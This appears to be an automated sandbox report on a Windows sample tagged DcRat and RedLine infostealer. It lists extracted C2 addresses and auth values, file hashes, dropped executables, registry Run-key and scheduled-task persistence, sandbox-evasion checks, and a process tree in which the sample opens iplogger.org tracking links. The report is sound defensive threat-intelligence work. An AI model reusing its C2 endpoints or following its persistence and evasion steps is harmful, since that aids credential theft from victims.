dcrat | 86360aa8ab41f3de1ba20cad54f2567c0d5994a20d5b58d0b71aa42c545bb9f8

Analysis

max time kernel
145s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
23-08-2022 01:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

55ba4842ad9f8cdb9ef581eebe3081e1.exe
Size

2.6MB
MD5

55ba4842ad9f8cdb9ef581eebe3081e1
SHA1

e4d9e92cd769624059d40a90922dabf097835a25
SHA256

86360aa8ab41f3de1ba20cad54f2567c0d5994a20d5b58d0b71aa42c545bb9f8
SHA512

d664695499b44876f3c7af475190ddd11122b69caf7bcd8a4820b07edde577468cc93b941139fd88230c3e3ed7beab5c657e874791a78e85730b18bff9587881

Score

10^/10

dcrat redline 5 5076357887 molecule jk nam3 discovery infostealer persistence rat spyware stealer

Malware Config

Extracted

Family

redline

Botnet

nam3

103.89.90.61:34589

Attributes

auth_value
64b900120bbceaa6a9c60e9079492895

Extracted

Family

redline

Botnet

176.113.115.146:9582

Attributes

auth_value
d38b30c1ccd6c1e5088d9e5bd9e51b0f

Extracted

Family

redline

Botnet

5076357887

195.54.170.157:16525

Attributes

auth_value
0dfaff60271d374d0c206d19883e06f3

Extracted

Family

redline

Botnet

Molecule JK

insttaller.com:40915

Attributes

auth_value
abb046f9600c78fd9272c2e96c3cfe48

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

Processes:

resource	yara_rule
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
behavioral2/memory/2448-196-0x0000000000AC0000-0x0000000000AE0000-memory.dmp	family_redline
behavioral2/memory/5228-201-0x0000000000450000-0x0000000000494000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
behavioral2/memory/5852-220-0x00000000001C0000-0x00000000001E0000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	family_redline
behavioral2/memory/5268-267-0x00000000004F0000-0x0000000000510000-memory.dmp	family_redline

Downloads MZ/PE file

Executes dropped EXE 17 IoCs

Processes:

F0geI.exekukurzka9000.exenamdoitntn.exereal.exesafert44.exejshainx.exebrokerius.execaptain09876.exeordo_sec666.exeffnameedit.exeme.exeSETUP_~1.EXEAlwgckdftdslvwbqpdbjc13t.exeSETUP_~1.EXEDllResource.exeAlwgckdftdslvwbqpdbjc13t.exeD608.exe

pid	process
2128	F0geI.exe
5004	kukurzka9000.exe
2448	namdoitntn.exe
3416	real.exe
5228	safert44.exe
5852	jshainx.exe
6668	brokerius.exe
6976	captain09876.exe
7136	ordo_sec666.exe
5268	ffnameedit.exe
5968	me.exe
4864	SETUP_~1.EXE
7072	Alwgckdftdslvwbqpdbjc13t.exe
4832	SETUP_~1.EXE
1196	DllResource.exe
6696	Alwgckdftdslvwbqpdbjc13t.exe
5980	D608.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

55ba4842ad9f8cdb9ef581eebe3081e1.exebrokerius.exeSETUP_~1.EXEAlwgckdftdslvwbqpdbjc13t.exeordo_sec666.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	55ba4842ad9f8cdb9ef581eebe3081e1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	brokerius.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	SETUP_~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	Alwgckdftdslvwbqpdbjc13t.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation	ordo_sec666.exe

Loads dropped DLL 13 IoCs

Processes:

F0geI.exebrokerius.exereal.exeSETUP_~1.EXEDllResource.exe

pid	process
2128	F0geI.exe
2128	F0geI.exe
2128	F0geI.exe
6668	brokerius.exe
6668	brokerius.exe
3416	real.exe
3416	real.exe
4832	SETUP_~1.EXE
4832	SETUP_~1.EXE
4832	SETUP_~1.EXE
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

captain09876.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	captain09876.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	captain09876.exe
Key created	\REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 2 IoCs

Processes:

SETUP_~1.EXEAlwgckdftdslvwbqpdbjc13t.exe

description	pid	process	target process
PID 4864 set thread context of 4832	4864	SETUP_~1.EXE	SETUP_~1.EXE
PID 7072 set thread context of 6696	7072	Alwgckdftdslvwbqpdbjc13t.exe	Alwgckdftdslvwbqpdbjc13t.exe

Drops file in Program Files directory 13 IoCs

Processes:

setup.exe55ba4842ad9f8cdb9ef581eebe3081e1.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7548d789-7237-4273-98c8-a359e067a8d6.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220823012703.pma	setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\safert44.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jshainx.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\me.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\F0geI.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\real.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\brokerius.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\captain09876.exe	55ba4842ad9f8cdb9ef581eebe3081e1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1096 2128 WerFault.exe F0geI.exe
412 5552 WerFault.exe explorer.exe

pid	pid_target	process	target process
1096	2128	WerFault.exe	F0geI.exe
412	5552	WerFault.exe	explorer.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Alwgckdftdslvwbqpdbjc13t.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Alwgckdftdslvwbqpdbjc13t.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Alwgckdftdslvwbqpdbjc13t.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Alwgckdftdslvwbqpdbjc13t.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

brokerius.exereal.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	brokerius.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	brokerius.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	real.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	real.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5192 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6312 timeout.exe

pid	process
5192	schtasks.exe

pid	process
6312	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6888 taskkill.exe
Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2540 PING.EXE

pid	process
6888	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
2540	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exebrokerius.exejshainx.exesafert44.exepowershell.exereal.exenamdoitntn.exeffnameedit.exeordo_sec666.exeidentity_helper.exeSETUP_~1.EXEpowershell.exeDllResource.exeAlwgckdftdslvwbqpdbjc13t.exeAlwgckdftdslvwbqpdbjc13t.exe

pid	process
3136	msedge.exe
3136	msedge.exe
3244	msedge.exe
3244	msedge.exe
2036	msedge.exe
2036	msedge.exe
5128	msedge.exe
5128	msedge.exe
4940	msedge.exe
4940	msedge.exe
5936	msedge.exe
5936	msedge.exe
5244	msedge.exe
5244	msedge.exe
5432	msedge.exe
5432	msedge.exe
6204	msedge.exe
6204	msedge.exe
6668	brokerius.exe
6668	brokerius.exe
5852	jshainx.exe
5852	jshainx.exe
5228	safert44.exe
5228	safert44.exe
4416	powershell.exe
4416	powershell.exe
3416	real.exe
3416	real.exe
4416	powershell.exe
2448	namdoitntn.exe
2448	namdoitntn.exe
5268	ffnameedit.exe
5268	ffnameedit.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
7136	ordo_sec666.exe
3996	identity_helper.exe
3996	identity_helper.exe
4864	SETUP_~1.EXE
4864	SETUP_~1.EXE
4796	powershell.exe
4796	powershell.exe
4796	powershell.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
1196	DllResource.exe
7072	Alwgckdftdslvwbqpdbjc13t.exe
7072	Alwgckdftdslvwbqpdbjc13t.exe
6696	Alwgckdftdslvwbqpdbjc13t.exe
6696	Alwgckdftdslvwbqpdbjc13t.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

Alwgckdftdslvwbqpdbjc13t.exe

pid process

6696 Alwgckdftdslvwbqpdbjc13t.exe
2420
2420
2420
2420

pid	process
6696	Alwgckdftdslvwbqpdbjc13t.exe
2420
2420
2420
2420

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

Processes:

msedge.exe

pid	process
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe
4940	msedge.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

SETUP_~1.EXEjshainx.exesafert44.exetaskkill.exepowershell.exenamdoitntn.exeffnameedit.exeAlwgckdftdslvwbqpdbjc13t.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4864	SETUP_~1.EXE
Token: SeDebugPrivilege	5852	jshainx.exe
Token: SeDebugPrivilege	5228	safert44.exe
Token: SeDebugPrivilege	6888	taskkill.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	2448	namdoitntn.exe
Token: SeDebugPrivilege	5268	ffnameedit.exe
Token: SeDebugPrivilege	7072	Alwgckdftdslvwbqpdbjc13t.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeShutdownPrivilege	2420
Token: SeCreatePagefilePrivilege	2420

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

4940 msedge.exe
4940 msedge.exe
4940 msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

55ba4842ad9f8cdb9ef581eebe3081e1.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	pid	process	target process
PID 4364 wrote to memory of 5056	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 5056	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 4940	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 4940	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 4184	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 4184	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 524	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 524	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4940 wrote to memory of 380	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 380	4940	msedge.exe	msedge.exe
PID 524 wrote to memory of 3480	524	msedge.exe	msedge.exe
PID 524 wrote to memory of 3480	524	msedge.exe	msedge.exe
PID 4184 wrote to memory of 544	4184	msedge.exe	msedge.exe
PID 4184 wrote to memory of 544	4184	msedge.exe	msedge.exe
PID 5056 wrote to memory of 2996	5056	msedge.exe	msedge.exe
PID 5056 wrote to memory of 2996	5056	msedge.exe	msedge.exe
PID 4364 wrote to memory of 1540	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 1540	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 1540 wrote to memory of 4092	1540	msedge.exe	msedge.exe
PID 1540 wrote to memory of 4092	1540	msedge.exe	msedge.exe
PID 4364 wrote to memory of 224	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 224	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 1376	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 1376	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 224 wrote to memory of 3768	224	msedge.exe	msedge.exe
PID 224 wrote to memory of 3768	224	msedge.exe	msedge.exe
PID 4364 wrote to memory of 824	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 824	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 1376 wrote to memory of 2012	1376	msedge.exe	msedge.exe
PID 1376 wrote to memory of 2012	1376	msedge.exe	msedge.exe
PID 824 wrote to memory of 3900	824	msedge.exe	msedge.exe
PID 824 wrote to memory of 3900	824	msedge.exe	msedge.exe
PID 4364 wrote to memory of 3568	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 4364 wrote to memory of 3568	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	msedge.exe
PID 3568 wrote to memory of 1156	3568	msedge.exe	msedge.exe
PID 3568 wrote to memory of 1156	3568	msedge.exe	msedge.exe
PID 4364 wrote to memory of 2128	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	F0geI.exe
PID 4364 wrote to memory of 2128	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	F0geI.exe
PID 4364 wrote to memory of 2128	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	F0geI.exe
PID 4364 wrote to memory of 5004	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	kukurzka9000.exe
PID 4364 wrote to memory of 5004	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	kukurzka9000.exe
PID 4364 wrote to memory of 5004	4364	55ba4842ad9f8cdb9ef581eebe3081e1.exe	kukurzka9000.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3116	4940	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\55ba4842ad9f8cdb9ef581eebe3081e1.exe
"C:\Users\Admin\AppData\Local\Temp\55ba4842ad9f8cdb9ef581eebe3081e1.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AEmX4
2⤵
- Suspicious use of WriteProcessMemory
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:2996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,12774364911914561418,4696184370529562135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12774364911914561418,4696184370529562135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
3⤵
PID:1288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1ARmX4
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x9c,0x104,0x7ffd3a7346f8,0x7ffd3a734708,0x7ffd3a734718
3⤵
PID:380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
3⤵
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1976 /prefetch:8
3⤵
PID:2164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
3⤵
PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
3⤵
PID:1748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
3⤵
PID:6552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
3⤵
PID:6896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
3⤵
PID:7112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
3⤵
PID:1688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
3⤵
PID:5264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16468486125238093308,8906164518488449461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
3⤵
PID:3324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
